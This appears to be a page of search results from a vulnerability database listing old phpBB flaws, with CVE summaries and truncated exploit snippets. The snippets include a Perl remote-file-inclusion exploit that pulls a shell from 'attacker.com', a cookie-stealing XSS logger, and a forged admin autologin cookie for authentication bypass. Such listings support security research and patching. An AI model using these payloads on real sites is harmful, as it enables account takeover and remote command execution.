70 matches found
CVE-2006-6840
Unspecified vulnerability in phpBB before 2.0.22 has unknown impact and remote attack vectors related to a "negative start parameter."...
phpBB < 2.0.22 Multiple Vulnerabilities
CVE-2006-6508
Cross-site request forgery (CSRF) vulnerability in phpBB 2.0.21 allows remote authenticated users to send unauthorized messages as an arbitrary user via unspecified vectors. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information...
phpbbsecurity-rfi.txt
!/usr/bin/perl phpBB Security 1.0.1 Class: Remote File Include Vulnerability Date: 2006/10/12 Remote: Yes Type: high Site: http://www.phpbb-amod.com/downloads/phpBBSecurity.zip use IO::Socket; use LWP::Simple; $cmdshell="http://attacker.com/cmd.txt"; ";$cmd = ; while$cmd ! "END" $socket =...
phpBB Security <= 1.0.1 (php_security.php) Remote File Include Exploit
Exploit for unknown platform in category web applications. phpBB Security <= 1.0.1 (php_security.php) Remote File Include Exploit !/usr/bin/perl phpBB Security...
phpBB Security 1.0.1 - 'PHP_security.php' Remote File Inclusion
!/usr/bin/perl phpBB Security 1.0.1 Class: Remote File Include Vulnerability Date: 2006/10/12 Remote: Yes Type: high Site: http://www.phpbb-amod.com/downloads/phpBBSecurity.zip use IO::Socket; use LWP::Simple;...
phpBB Security <= 1.0.1 (php_security.php) Remote File Include Exploit
No description provided by source. !/usr/bin/perl phpBB Security 1.0.1 Class: Remote File Include Vulnerability Date: 2006/10/12 Remote: Yes Type: high Site: http://www.phpbb-amod.com/downloads/phpBBSecurity.zip...
phpBB Security Suite Mod 1.0.0 (logger_engine.php) Remote File Include
SpiderZ Hacking Security Author: SpiderZ Security Suite IP Logger Remote File Inclusion Vulnerability For: phpBB 2.0.x - 2.0.21 Site: www.spiderz.altervista.org Site02: www.spiderz.netsons.org Remote File Inclusion - Security Suite IP Logger...
phpBB Security Suite Mod 1.0.0 (logger_engine.php) Remote File Include
SpiderZ Hacking Security Author: SpiderZ Dimension of phpBB Remote File Inclusion Vulnerability For: Dimension of phpBB 0.2.5 phpBB 2.0.21 Site: www.spiderz.altervista.org Site02: www.spiderz.netsons.org Remote File Inclusion...
phpBB Security Suite Mod 1.0.0 - logger_engine.php Remote File Inclusion
SpiderZ Hacking Security Author: SpiderZ Security Suite IP Logger Remote File Inclusion Vulnerability For: phpBB 2.0.x - 2.0.21 Site:...
phpBB Security Suite Mod 1.0.0 - 'logger_engine.php' Remote File Inclusion
SpiderZ Hacking Security Author: SpiderZ Security Suite IP Logger Remote File Inclusion Vulnerability For: phpBB 2.0.x - 2.0.21 Site: www.spiderz.altervista.org Site02: www.spiderz.netsons.org Remote File Inclusion - Security Suit...
CVE-2006-0632
The gen_rand_string function in phpBB 2.0.19 uses insufficiently random data (small value space) to create the activation key ("validation ID") that is sent by e-mail when establishing a password, which makes it easier for remote attackers to obtain the key and modify passwords for existing accounts or...
phpBB 2.0.16 - Cross-Site Scripting Remote Cookie Disclosure (Cookie Grabber)
// Original Author: 'Sjaak Rake' Ref: http://www.hackthissite.org/articles/read/175/ IP: ' .$ip. ' Date and Time: ' .$date. ' Referer: '.$referer.''; fclose$fp; ? //rename it to cookies.php and create one new file steal.php and chmod it to 777 milw0rm.com 2005-07-13...
phpBB < 2.0.17 Nested BBCode URL Tags XSS
phpBB < 2.0.16 viewtopic.php Arbitrary Code Execution
phpBB Remote - mod.php SQL Injection
Source: https://www.securityfocus.com/bid/13209/info A remote SQL injection vulnerability affects the datenbank module for phpbb. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in SQL queries. A...
phpBB up.php Arbitrary File Upload
The installed version of phpBB on the remote host includes a file upload script intended as a way for users to upload files that they can then link to in their posts. The script, however, does not require authentication, makes only a limited check of upload file types, and stores uploads in a kno...
phpBB 2.0.12 - Change User Rights Authentication Bypass
!/usr/bin/perl -w phpBB new ; my $cookiejar = HTTP::Cookies-new ; $browser-cookiejar $cookiejar ; $cookiejar-setcookie "0","phpbb2mysqldata", "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D", "/",$host,,,,,; if defined $proxy $proxy = s/http:////eg;...
phpBB 2.0.12 - Session Handling Authentication Bypass
phpBB 2.0.12 - Session Handling Authentication Bypass phpBB 2.0.12 Session Handling Authentication Bypass .. easy to use exploit .. YOU DON'T HAVE TO REGISTER AT THE VICTIM'S FORUM.. 1- Simply VISIT the forum using Mozilla Firefox.. and be sure that the cookie is made : 3- Close the Browser .. 2-...
[SA14413] phpBB "autologinid" Security Bypass